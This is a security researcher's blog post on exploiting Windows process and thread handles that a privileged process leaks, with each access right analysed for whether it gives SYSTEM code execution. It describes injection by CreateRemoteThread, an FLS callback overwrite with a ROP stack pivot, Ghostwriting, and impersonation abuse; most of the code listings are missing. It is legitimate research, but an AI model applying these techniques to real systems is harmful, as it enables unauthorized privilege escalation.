Over the years I’ve seen and exploited the occasional leaked handle bug. These can be
particularly fun to toy with, as the handles aren’t always granted
THREAD_ALL_ACCESS, requiring a bit more ingenuity.
This post will address the various access rights assignable to handles and what we
can do to exploit them to gain elevated code execution. I’ve chosen to focus
specifically on process and thread handles as this seems to be the most common,
but surely other objects can be exploited in similar manner.
As background, while this bug can occur under various circumstances, I’ve most
commonly seen it manifest when some privileged process opens a handle with
bInheritHandle set to true. Once this happens, any child process of this
privileged process inherits the handle and all access it grants. As example,
assume a SYSTEM level process does this:
Since it’s allowing the opened handle to be inherited, any child process will gain access to it. If they execute userland code impersonating the desktop user, as a service might often do, those userland processes will have access to that handle.
There are several public bugs we can point to over the years as example and
inspiration. As per usual James Forshaw has a fun one from 2016 in which
he’s able to leak a privileged thread handle out of the secondary logon
THREAD_ALL_ACCESS. This is the most “open” of permissions, but
he exploited it in a novel way that I was unaware of, at the time.
Another one from Ivan Fratric exploited a leaked process handle with
PROCESS_DUP_HANDLE, which even Microsoft knew was bad. In his
Mitigations by Attacking JIT Server in Microsoft Edge whitepaper, he
identifies the JIT server process mapping memory into the content process. To
do this, the JIT process needs a handle to it. The content process calls
DuplicateHandle on itself with the
PROCESS_DUP_HANDLE, which can be
exploited to obtain a full access handle.
A more recent example is a Dell LPE  in which a
was obtained from a privileged process. They were able to exploit this via a
dropped DLL and an APC.
In this post, I wanted to examine all possible access rights to determine which were exploitable on there own and which were not. Of those that were not, I tried to determine what concoction of privileges were necessary to make it so. I’ve tried to stay “realistic” here in my experience, but you never know what you’ll find in the wild, and this post reflects that.
For testing, I created a simple client and server: a privileged server that leaks a handle, and a client capable of consuming it. Here’s the server:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36
In the above, I’m grabbing a handle to the token we want to impersonate, opening an inheritable handle to the current process (which we’re running as SYSTEM), then spawning a child process. This child process is simply my client application, which will go about attempting to exploit the handle.
The client is, of course, a little more involved. The only component that needs
a little discussion up front is fetching the leaked handle. This can be done
NtQuerySystemInformation and does not require any special privileges:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112
We’re essentially just fetching all system handles, filtering down to ones belonging to our process, then hunting for a thread or a process. In a more active client process with many threads or process handles we’d need to filter down further, but this is sufficient for testing.
The remainder of this post will be broken down into process and thread security access rights.
There are approximately 14 process-specific rights. We’re going to ignore the standard object access rights for now (DELETE, READ_CONTROL, etc.) as they apply more to the handle itself than what it allows one to do.
Right off the bat, we’re going to dismiss the following:
1 2 3 4 5 6 7 8
To be clear I’m only suggesting that the above access rights cannot be exploited on their own; they are, of course, very useful when roped in with others. There may be weird edge cases in which one of these might be useful (PROCESS_TERMINATE, for example), but barring any magic, I don’t see how.
That leaves the following:
1 2 3 4 5 6
We’ll run through each of these individually.
The most obvious of them all, this one grants us access to it all. We can simply allocate memory and create a thread to obtain code execution:
1 2 3 4
Nothing to it.
This right is “required to create a process”, which is to say that we can spawn child processes. To do this remotely, we just need to spawn a process and set its parent to the privileged process we’ve got a handle to. This will create the new process and inherit its parent token which will hopefully be a SYSTEM token.
Here’s how we do that:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
We should now have calc running with the privileged token. Obviously we’d want to replace that with something more useful!
Here we’ve got the ability to use
CreateRemoteThread, but can’t control any
memory in the target process. There are of course ways we can influence memory
without direct write access, such as WNF, but we’d still have no way of
resolving those addresses. As it turns out, however, we don’t need the control.
CreateRemoteThread can be pointed at a function with a single argument, which
gives us quite a bit of control.
WinExec are both great
candidates for executing child processes or loading arbitrary code.
As example, there’s an ANSI
cmd.exe located in msvcrt.dll at offset 0x503b8.
We can pass this as an argument to
CreateRemoteThread and trigger a
call to pop a shell:
1 2 3 4 5
We can do something similar for
LoadLibraryA. This of course is predicated on
the system path containing a writable directory for our user.
Microsoft’s own documentation on process security and access rights points to
this specifically as a sensitive right. Using it, we can simply duplicate our
process handle with
PROCESS_ALL_ACCESS, allowing us full RW to its address
space. As per Ivan Fratric’s JIT bug, it’s as simple as this:
Now we can simply follow the WriteProcessMemory/CreateRemoteThread strategy for executing arbitrary code.
Granting this permission allows one to execute
addition to several fields in
NtSetInformationProcess. The latter is far more
powerful, but many of the
PROCESSINFOCLASS fields available are either read
only or require additional privileges to actually set (
example). Process Hacker maintains an up to date definition of this class
and its members.
Of the available flags, none were particularly interesting on their own. I
needed to add
PROCESS_VM_* privileges in order to make any usable and at
that point we defeat the purpose.
This covers the three flavors of VM access: WRITE/READ/OPERATION. The first two
should be self-explanatory and the third allows one to operate on the virtual
address space itself, such as changing page protections (VirtualProtectEx) or
allocating memory (VirtualAllocEx). I won’t address each permutation of these
three, but I think it’s reasonable to assume that
PROCESS_VM_WRITE is a
necessary requirement. While
PROCESS_VM_OPERATION allows us to crash the
remote process which could open up other flaws, it’s not a generic nor elegant
approach. Ditto with
PROCESS_VM_WRITE proved to be a challenge on its own, and I was unable to
come up with a generic solution. At first blush, the entire set of
Shatter-like injection strategies documented by Hexacorn seem like
they’d be perfect. They simply require the remote process to use windows,
clipboard registrations, etc. None of these are guaranteed, but chances are one
is bound to exist. Unfortunately for us, many of them restrict access across
sessions or scaling integrity levels. We can write into the remote process,
but we need some way to gain control over execution flow.
In addition to being unable to modify page permissions, we cannot read nor map/allocate memory. There are plenty of ways we can leak memory from the remote process without directly interfacing with it, however.
NtQuerySystemInformation, for example, we can enumerate all threads
inside a remote process regardless of its IL. This grants us a list of
SYSTEM_EXTENDED_THREAD_INFORMATION objects which contain, among other
things, the address of the TEB.
NtQueryInformationProcess allows us to fetch
the remote process PEB address. This latter API requires the
PROCESS_QUERY_INFORMATION right, however, which ended up throwing a major
wrench in my plan. Because of this I’m appending
PROCESS_VM_WRITE which gives us the necessary components to pull this
off. If someone knows of a way to leak the address of a remote process PEB
without it, I’d love to hear.
The approach I took was a bit loopy, but it ended up working reliably and generically. If you’ve read my previous post on fiber local storage (FLS), this is the research I was referring to. If you haven’t, I recommend giving it a brief read, but I’ll regurgitate a bit of it here.
Briefly, we can abuse fibers and FLS to overwrite callbacks which are executed “…on fiber deletion, thread exit, and when an FLS index is freed”. The primary thread of a process will always setup a fiber, thus there will always be a callback for us to overwrite (msvcrt!_freefls). Callbacks are stored in the PEB (FlsCallback) and the fiber local storage in the TEB (FlsData). By smashing the FlsCallback we can obtain control over execution flow when one of the fiber actions are taken.
With only write access to the process, however, this becomes a bit convoluted. We cannot allocate memory and so we need some known location to put the payload. In addition, the FlsCallback and FlsData variables in PEB/TEB are pointers and we’re unable to read these.
Stashing the payload turned out to be pretty simple. Since we’ve established we can leak PEB/TEB addresses we already have two powerful primitives. After looking over both structures, I found that thread local storage (TLS) happened to provide us with enough room to store ROP gadgets and a thin payload. TLS is embedded within the structure itself, so we can simply offset into the TEB address (which we have). If you’re unfamiliar with TLS, Skywing’s write-ups are fantastic and have aged well.
Gaining control over the callback was a little trickier. A pointer to a
_FLS_CALLBACK_INFO structure is stored in the PEB (FlsCallback) and is an
opaque structure. Since we can’t actually read this pointer, we have no simple
way of overwriting the pointer. Or do we?
What I ended up doing is overwriting the FlsCallback pointer itself in the PEB,
essentially creating my own fake
_FLS_CALLBACK_INFO structure in TLS. It’s a
pretty simple structure and really only has one value of importance: the
In addition, as per the FLS article, we also need to take control over ECX/RCX.
This will allow us to stack pivot and continue executing our ROP payload. This
requires that we update the
TEB->FlsData entry which we also are unable to
do, since it’s a pointer. Much like
FlsCallback, though, I was able to just
overwrite this value and craft my own data structure, which also turned out to
be pretty simple. The TLS buffer ended up looking like this:
1 2 3 4 5
There just so happens to be a perfect stack pivot gadget located in
kernel32!SwitchToFiber on Windows 7):
Putting this all together, execution results in:
1 2 3 4 5 6 7 8 9 10 11 12 13 14
Now we’ve got EIP and a stack pivot. Instead of marking memory and executing
some other payload, I took a quick and lazy strategy and simply called
LoadLibraryA to load a DLL off disk from an arbitrary location. This works
well, is reliable, and even on process exit will execute and block, depending
on what you do within the DLL. Here’s the final code to achieve all this:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45
If all works well you should see attempts to load
AAAA.dll off disk when the
callback is executed (just close the process). As a note, we’re using
NtWriteVirtualMemory here because
PROCESS_VM_OPERATION which we may not have.
Another variation of this access might be
This gives us visibility into the address space, but we still cannot allocate
or map memory into the remote process. Using the above strategy we can rid
ourselves of the
PROCESS_QUERY_INFORMATION requirement and simply read the
PEB address out of TEB.
PROCESS_VM_OPERATION loosens the restrictions quite a bit, as we
can now allocate memory and change page permissions. This allows us to more
easily use the above strategy, but also perform inline and IAT hooks.
As with the process handles, there are a handful of access rights we can dismiss immediately:
1 2 3 4 5 6
Which leaves the following:
1 2 3 4 5 6 7
There’s quite a lot we can do with this, including everything described in the
following thread access rights sections. I personally find the
THREAD_DIRECT_IMPERSONATION strategy to be the easiest.
There is another option that is a bit more arcane, but equally viable. Note
that this thread access doesn’t give us VM read/write privileges, so there’s
no easy to way to “write” into a thread, since that doesn’t really make sense.
What we do have, however, is a series of APIs that sort of grant us that:
GetThreadContext. About a decade ago a code
injection technique dubbed Ghostwriting was released to little fanfare. In
it, the author describes a code injection strategy that does not require the
typical win32 API calls; there’s no WriteProcessMemory, NtMapViewOfSection, or
While the write-up is lacking in a few departments, it’s quite a clever bit of
code. In short, the author abuses the
calls in tandem with a set of specific assembly gadgets to write a payload,
dword by dword, onto the threads stack. Once written, they use
NtProtectVirtualMemoryAddress to mark the code RWX and redirect code flow to
For their write gadget, they hunt for a pattern inside NTDLL:
They then locate a
JMP $, or jump here, which will operate as an auto lock
and infinitely loop. Once we’ve found our two gadgets, we suspend the thread.
We update its RIP to point to the MOV gadget, set our REG1 to an adjusted RSP
so the return address is the
JMP $, and set REG2 to the jump gadget. Here’s
my write function:
1 2 3 4 5 6 7 8 9 10
SetContextRegister call simply assigns REG1 and REG2 in our gadget to the
appropriate registers. Once those are set, we set our stack base (adjusted from
threads RSP) and update RIP to our gadget. The first time we execute this we’ll
JMP $ gadget to the stack.
They use what they call a thread auto lock to control execution flow (edits mine):
1 2 3 4 5 6 7 8 9 10 11 12 13
It’s really just a dumb waiter that allows the thread to execute a little bit each run before checking if the “sink” gadget has been reached.
Once our execution hits the jump, we have our write primitive. We can now simply adjust RIP back to the MOV gadget, update RSP, and set REG1 and REG2 to any values we want.
I ported the core function of this technique to x64 to demonstrate its
viability. Instead of using it to execute an entire payload, I simply execute
LoadLibraryA to load in an arbitrary DLL at an arbitrary path. The code is
available on Github. Turning it into something production ready is left as
an exercise for the reader ;)
Additionally, while attending Blackhat 2019, I saw a process injection talk by the SafeBreach Labs group. They’ve release a code injection tool that contains an x64 implementation of GhostWriting. While I haven’t personally evaluated it, it’s probably more production ready and usable than mine.
This differs from
THREAD_IMPERSONATE in that it allows the thread token to be
impersonated, not simply TO impersonate. Exploiting this is simply a matter of
NtImpersonateThread API, as pointed out by James Forshaw.
Using this we’re able to create a thread totally under our control and
impersonate the privileged one:
hNewThread will now be executing with a SYSTEM token, allowing us to do
whatever we need under the privileged impersonation context.
Unfortunately I was unable to identify a surefire, generic method for exploiting this one. We have no ability to query the remote thread, nor can we gain any control over its execution flow. We’re simply allowed to manage its impersonation state.
We can use this to force the privileged thread to impersonate us, using the
NtImpersonateThread call, which may unlock additional logic bugs in the
application. For example, if the service were to create shared resources under
a user context for which it would typically be SYSTEM, such as a file, we can
gain ownership over that file. If multiple privileged threads access it for
information (such as configuration) it could lead to code execution.
While this right grants us access to
SetThreadContext, it also conveniently
allows us to use
QueueUserAPC. This is effectively granting us a
CreateRemoteThread primitive with caveat. For an APC to be processed by the
thread, it needs to enter an alertable state. This happens when a specific set
of win32 functions are executed, so it is entirely possible that the thread
never becomes alertable.
If we’re working with an uncooperative thread,
SetThreadContext comes in
handy. Using it, we can force the thread to become alertable via the
NtTestAlert function. Of course, we have no ability to call
GetThreadContext and will therefore likely lose control of the thread after
In combination with
THREAD_GET_CONTEXT, this right would allow us to
replicate the Ghostwriting code injection technique discussed in the
THREAD_ALL_ACCESS section above.
Needed to set various ThreadInformationClass values on a thread, usually via
NtSetInformationThread. After looking through all of these, I did not
identify any immediate ways in which we could influence the remote thread. Some
of the values are interesting but unusuable (
ThreadAttachContainer, etc) and are either not implemented/removed or
SeDebugPrivilege or similar.
I’m not really sure what would make this a viable candidate either. There’s really not a lot of juicy stuff that can be done via the available functions
This allows the caller to set a subset of
ThreadNameInformation. None of these get us
anywhere near an exploitable primitive.
THREAD_IMPERSONATE, I was unable to find a direct and generic
method of abusing this right. I can set the thread’s token or modify a few
SetTokenInformation), but this doesn’t grant us much.
I was a little disappointed in how uneventful thread rights seemed to be. Almost half of them proved to be unexploitable on their own, and even in combination did not turn much up. As per above, having one of the following three privileges is necessary to turn a leaked thread handle into something exploitable:
1 2 3
Missing these will require a deeper understanding of your target and some creativity.
Similarly, processes have a specific subset of rights that are directly exploitable:
1 2 3 4 5
Barring these, more creativity is required.